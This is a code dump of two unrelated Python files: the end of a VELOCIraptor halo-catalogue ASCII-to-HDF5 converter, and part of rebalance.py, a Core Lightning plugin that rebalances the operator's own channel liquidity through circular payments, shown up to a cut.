hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
def ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_groups"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_groups"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
fieldnames=["Group_Size","Offset","Offset_unbound","Number_of_substructures_in_halo","Parent_halo_ID"]
fieldtype=[np.uint32,np.uint64,np.uint64,np.uint32,np.int64]
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_groups"
hdffilename=basefilename+".hdf.catalog_groups"
else:
filename=basefilename+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf.catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
#will look like one dimensional array of values split into
#"Group_Size"
#"Offset"
#"Offset_unbound"
#"Number_of_substructures_in_halo"
#"Parent_halo_ID"
#each of size numhalos
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_groups"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"
else:
filename=basefilename+".sublevels"+".catalog_groups"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
def ConvertASCIICatalogParticleFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_particles"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"
else:
filename=basefilename+".sublevels"+".catalog_particles"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIICatalogParticleTypeFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_parttypes"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"
else:
filename=basefilename+".sublevels"+".catalog_parttypes"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIIToHDF(basefilename,iseparatesubfiles=0,itype=0,iverbose=0):
ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
if (itype==1):
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
|
rebalance.py | #!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
delay = plugin.cltv_final
for r in reversed(route):
r['msatoshi'] = msatoshi.millisatoshis
r['amount_msat'] = msatoshi
r['delay'] = delay
channels = plugin.rpc.listchannels(r['channel'])
ch = next(c for c in channels.get('channels') if c['destination'] == r['id'])
fee = Millisatoshi(ch['base_fee_millisatoshi'])
# BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
fee += (msatoshi * ch['fee_per_millionth'] + 10**6 - 1) // 10**6 # integer math trick to round up
msatoshi += fee
delay += ch['delay']
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
channel = next(c for c in peer['channels'] if c.get('short_channel_id') == scid)
if check_state:
if channel['state'] != "CHANNELD_NORMAL":
raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, channel['state'])})
if not peer['connected']:
raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
return channel
def amounts_from_scid(plugin, scid):
channels = plugin.rpc.listfunds().get('channels')
channel = next(c for c in channels if c.get('short_channel_id') == scid)
our_msat = Millisatoshi(channel['our_amount_msat'])
total_msat = Millisatoshi(channel['amount_msat'])
return our_msat, total_msat
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
channels = plugin.rpc.listchannels(short_channel_id).get('channels')
for ch in channels:
if ch['source'] == my_node_id:
return ch['destination']
raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
def find_worst_channel(route):
if len(route) < 4:
return None
start_idx = 2
worst = route[start_idx]
worst_val = route[start_idx - 1]['msatoshi'] - route[start_idx]['msatoshi']
for i in range(start_idx + 1, len(route) - 1):
val = route[i - 1]['msatoshi'] - route[i]['msatoshi']
if val > worst_val:
worst = route[i]
worst_val = val
return worst
def cleanup(plugin, label, payload, rpc_result, error=None):
try:
plugin.rpc.delinvoice(label, 'unpaid')
except RpcError as e:
# race condition: waitsendpay timed out, but invoice get paid
if 'status is paid' in e.error.get('message', ""):
return rpc_result
if error is not None and isinstance(error, RpcError):
# unwrap rebalance errors as 'normal' RPC result
if error.method == "rebalance":
return {"status": "exception",
"message": error.error.get('message', "error not given")}
raise error
return rpc_result
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error, when this isnt possible.
#
# EXAMPLE
# |------------------- out_total -------------|
# OUT -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN +v <= |-- in_ours --||---------- in_theirs ---------| <= -v
# |--------- in_total --------------------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
# O* vo = out_ours - (out_total/2)
# I* vi = (in_total/2) - in_ours
# return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
out_ours, out_total = int(out_ours), int(out_total)
in_ours, in_total = int(in_ours), int(in_total)
in_theirs = in_total - in_ours
vo = int(out_ours - (out_total / 2))
vi = int((in_total / 2) - in_ours)
# cases where one option can be eliminated because it exceeds other capacity
if vo > in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi > out_ours and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# cases where one channel is still capable to bring other to balance
if vo < 0 and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi < 0 and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# when both options are possible take the one with least effort
if vo > 0 and vo < in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(min(vi, vo))
raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
class NoRouteException(Exception):
pass
def getroute_basic(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
try:
""" This does not make special assumptions and tries all routes
it gets. Uses less CPU and does not filter any routes.
"""
return plugin.rpc.getroute(targetid,
fromid=fromid,
exclude=excludes,
msatoshi=msatoshi,
maxhops=plugin.maxhops,
riskfactor=10, cltv=9)
except RpcError as e:
# could not find route -> change params and restart loop
if e.method == "getroute" and e.error.get('code') == 205:
raise NoRouteException
raise e
def getroute_iterative(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
""" This searches for 'shorter and bigger pipes' first in order
to increase likelyhood of success on short timeout.
Can be useful for manual `rebalance`.
"""
try:
return plugin.rpc.getroute(targetid,
fromid=fromid,
exclude=excludes,
msatoshi=msatoshi * plugin.msatfactoridx,
maxhops=plugin.maxhopidx,
riskfactor=10, cltv=9)
except RpcError as e:
# could not find route -> change params and restart loop
if e.method == "getroute" and e.error.get('code') == 205:
# reduce _msatfactor to look for smaller channels now
plugin.msatfactoridx -= 1
if plugin.msatfactoridx < 1:
# when we reached neutral msat factor:
# increase _maxhops and restart with msatfactor
plugin.maxhopidx += 1
plugin.msatfactoridx = plugin.msatfactor
# abort if we reached maxhop limit
if plugin.maxhops > 0 and plugin.maxhopidx > plugin.maxhops:
raise NoRouteException
raise e
def getroute_switch(method_name):
switch = {
"basic": getroute_basic,
"iterative": getroute_iterative
}
return switch.get(method_name, getroute_iterative)
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
retry_for: int = 60, maxfeepercent: float = 0.5,
exemptfee: Millisatoshi = Millisatoshi(5000),
getroute_method=None):
"""Rebalancing channel liquidity with circular payments.
This tool helps to move some msatoshis between your channels.
"""
if msatoshi:
msatoshi = Millisatoshi(msatoshi)
retry_for = int(retry_for)
maxfeepercent = float(maxfeepercent)
if getroute_method is None:
getroute = plugin.getroute
else:
getroute = getroute_switch(getroute_method)
exemptfee = Millisatoshi(exemptfee)
payload = {
"outgoing_scid": outgoing_scid,
"incoming_scid": incoming_scid,
"msatoshi": msatoshi,
"retry_for": retry_for,
"maxfeepercent": maxfeepercent,
"exemptfee": exemptfee
}
my_node_id = plugin.rpc.getinfo().get('id')
outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
in_ours, in_total = amounts_from_scid(plugin, incoming_scid)
# If amount was not given, calculate a suitable 50/50 rebalance amount
if msatoshi is None:
msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
plugin.log("Estimating optimal amount %s" % msatoshi)
# Check requested amounts are selected channels
if msatoshi > out_ours or msatoshi > in_total - in_ours:
raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})
plugin.log(f"starting rebalance out_scid:{outgoing_scid} in_scid:{incoming_scid} amount:{msatoshi}", 'debug')
route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
start_ts = int(time.time())
label = "Rebalance-" + str(uuid.uuid4())
description = "%s to %s" % (outgoing_scid, incoming_scid)
invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
payment_hash = invoice['payment_hash']
# The requirement for payment_secret coincided with its addition to the invoice output.
payment_secret = invoice.get('payment_secret')
rpc_result = None
excludes = [my_node_id] # excude all own channels to prevent shortcuts
nodes = {} # here we store erring node counts
plugin.maxhopidx = 1 # start with short routes and increase
plugin.msatfactoridx = plugin.msatfactor # start with high capacity factor
# and decrease to reduce WIRE_TEMPORARY failures because of imbalances
# 'disable' maxhops filter if set to <= 0
# I know this is ugly, but we don't ruin the rest of the code this way
if plugin.maxhops <= 0:
plugin.maxhopidx = 20
# trace stats
count = 0
count_sendpay = 0
time_getroute = 0
time_sendpay = 0
try:
while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
count += 1
try:
time_start = time.time()
r = getroute(plugin,
targetid=incoming_node_id,
fromid=outgoing_node_id,
excludes=excludes,
msatoshi=msatoshi)
time_getroute += time.time() - time_start
except NoRouteException:
# no more chance for a successful getroute
rpc_result = {'status': 'error', 'message': 'No suitable routes found'}
return cleanup(plugin, label, payload, rpc_result)
except RpcError as e:
# getroute can be successful next time with different parameters
if e.method == "getroute" and e.error.get('code') == 205:
continue
else:
raise e
route_mid = r['route']
route = [route_out] + route_mid + [route_in]
setup_routing_fees(plugin, route, msatoshi)
fees = route[0]['amount_msat'] - msatoshi
# check fee and exclude worst channel the next time
# NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
worst_channel = find_worst_channel(route)
if worst_channel is None:
raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
excludes.append(worst_channel['channel'] + '/' + str(worst_channel['direction']))
continue
rpc_result = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
"outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "complete",
"message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
for r in route:
plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')
time_start = time.time()
count_sendpay += 1
try:
plugin.rpc.sendpay(route, payment_hash, payment_secret=payment_secret)
running_for = int(time.time()) - start_ts
result = plugin.rpc.waitsendpay(payment_hash, max(retry_for - running_for, 0))
time_sendpay += time.time() - time_start
if result.get('status') == "complete":
rpc_result["stats"] = f"running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}"
return cleanup(plugin, label, payload, rpc_result)
except RpcError as e:
time_sendpay += time.time() - time_start
plugin.log(f"maxhops:{plugin.maxhopidx} msatfactor:{plugin.msatfactoridx} running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}", 'debug')
# plugin.log(f"RpcError: {str(e)}", 'debug')
# check if we ran into the `rpc.waitsendpay` timeout
if e.method == "waitsendpay" and e.error.get('code') == 200:
raise RpcError("rebalance", payload, {'message': 'Timeout reached'})
# check if we have problems with our own channels
erring_node = e.error.get('data', {}).get('erring_node')
erring_channel = e.error.get('data', {}).get('erring_channel')
erring_direction = e.error.get('data', {}).get('erring_direction')
if erring_channel == incoming_scid:
raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
if erring_channel == outgoing_scid:
raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
# exclude other erroring channels
if erring_channel is not None and erring_direction is not None:
excludes.append(erring_channel + '/' + str(erring_direction))
# count and exclude nodes that produce a lot of errors
if erring_node and plugin.erringnodes > 0:
if nodes.get(erring_node) is None:
nodes[erring_node] = 0
nodes[erring_node] += 1
if nodes[erring_node] >= plugin.erringnodes:
excludes.append(erring_node)
except Exception as e:
return cleanup(plugin, label, payload, rpc_result, e)
rpc_result = {'status': 'error', 'message': 'Timeout reached'}
return cleanup(plugin, label, payload, rpc_result)
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
# a minus b, but Millisatoshi cannot be negative
return a - b if a > b else Millisatoshi(0)
def must_send(liquidity):
# liquidity is too high, must send some sats
return a_minus_b(liquidity["min"], liquidity["their"])
def should_send(liquidity):
# liquidity is a bit high, would be good to send some sats
return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])
def could_send(liquidity):
# liquidity maybe a bit low, but can send some more sats, if needed
return a_minus_b(liquidity["our"], liquidity["min"])
def must_receive(liquidity):
# liquidity is too low, must receive some sats
return a_minus_b(liquidity["min"], liquidity["our"])
def should_receive(liquidity):
# liquidity is a bit low, would be good to receive some sats
return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])
def could_receive(liquidity):
# liquidity maybe a bit high, but can receive some more sats, if needed
return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
channels = []
for peer in plugin.rpc.listpeers()["peers"]:
for ch in peer["channels"]:
if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]:
channels.append(ch)
return channels
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
# check if overall rebalances can be successful with this threshold
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
required = Millisatoshi(0)
for ch in channels:
required += min(threshold, ch["total_msat"] / 2)
return required < our and required < total - our
def get_enough_liquidity_threshold(channels: list):
low = Millisatoshi(0)
biggest_channel = max(channels, key=lambda ch: ch["total_msat"])
high = biggest_channel["total_msat"] / 2
while True:
mid = (low + high) / 2
if high - low < Millisatoshi("1sat"):
break
if check_liquidity_threshold(channels, mid):
low = mid
else:
high = mid
return mid / 2
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
# ideal liquidity ratio for big channels:
# small channels should have a 50/50 liquidity ratio to be usable
# and big channels can store the remaining liquidity above the threshold
assert len(channels) > 0
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
chs = list(channels) # get a copy!
while len(chs) > 0:
ratio = int(our) / int(total)
smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
break
min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
diff = smallest_channel["total_msat"] * ratio
diff = max(diff, min_liquidity)
diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
our -= diff
total -= smallest_channel["total_msat"]
chs.remove(smallest_channel)
assert 0 <= ratio and ratio <= 1
return ratio
def feeadjust_would_be_nice(plugin: Plugin):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjust"]
if len(commands) == 1:
msg = plugin.rpc.feeadjust()
plugin.log(f"Feeadjust succeeded: {msg}")
else:
plugin.log("The feeadjuster plugin would be useful here")
def get_max_amount(i: int, plugin: Plugin):
return max(plugin.min_amount, plugin.enough_liquidity / (4**(i + 1)))
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
# TODO: sanity check
return (plugin.fee_base + msat * plugin.fee_ppm / 10**6) * plugin.feeratio
def get_chan(plugin: Plugin, scid: str):
for peer in plugin.rpc.listpeers()["peers"]:
if len(peer["channels"]) == 0:
continue
# We might have multiple channel entries ! Eg if one was just closed
# and reopened.
for chan in peer["channels"]:
if chan.get("short_channel_id") == scid:
return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
liquidity = {
"our": channel["to_us_msat"],
"their": channel["total_msat"] - channel["to_us_msat"],
"min": min(enough_liquidity, channel["total_msat"] / 2),
"max": max(a_minus_b(channel["total_msat"], enough_liquidity), channel["total_msat"] / 2),
"ideal": {}
}
liquidity["ideal"]["our"] = min(max(channel["total_msat"] * ideal_ratio, liquidity["min"]), liquidity["max"])
liquidity["ideal"]["their"] = min(max(channel["total_msat"] * (1 - ideal_ratio), liquidity["min"]), liquidity["max"])
return liquidity
def wait_for(success, timeout: int = 60):
# cyclical lambda helper
# taken and modified from pyln-testing/pyln/testing/utils.py
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
return False
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
# HTLC settlement helper
# taken and modified from pyln-testing/pyln/testing/utils.py
result = True
peers = plugin.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel.get('short_channel_id') not in scids:
continue
if channel.get('short_channel_id') in failed_channels:
result = False
continue
if 'htlcs' in channel:
if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
failed_channels.append(channel.get('short_channel_id'))
plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
result = False
return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
scid1 = ch1["short_channel_id"]
scid2 = ch2["short_channel_id"]
result = {"success": False, "fee_spent": Millisatoshi(0)}
if scid1 + ":" + scid2 in failed_channels:
return result
# check if HTLCs are settled
if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
return result
i = 0
while not plugin.rebalance_stop:
liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)
amount1 = min(must_send(liquidity1), could_receive(liquidity2))
amount2 = min(should_send(liquidity1), should_receive(liquidity2))
amount3 = min(could_send(liquidity1), must_receive(liquidity2))
amount = max(amount1, amount2, amount3)
if amount < plugin.min_amount:
return result
amount = min(amount, get_max_amount(i, plugin))
maxfee = get_max_fee(plugin, amount)
plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
start_ts = time.time()
try:
res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2,
msatoshi=amount, retry_for=1200, maxfeepercent=0,
exemptfee=maxfee)
if not res.get('status') == 'complete':
raise Exception # fall into exception handler below
except Exception:
failed_channels.append(scid1 + ":" + scid2)
# rebalance failed, let's try with a smaller amount
while (get_max_amount(i, plugin) >= amount and
get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
i += 1
if amount > get_max_amount(i, plugin):
continue
return result
result["success"] = True
result["fee_spent"] += res["fee"]
htlc_start_ts = time.time()
# wait for settlement
htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
current_ts = time.time()
res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
plugin.log(f"Rebalance succeeded: {res}")
if not htlc_success:
return result
ch1 = get_chan(plugin, scid1)
assert ch1 is not None
ch2 = get_chan(plugin, scid2)
assert ch2 is not None
return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
channels = get_open_channels(plugin)
for ch1 in channels:
for ch2 in channels:
if ch1 == ch2:
continue
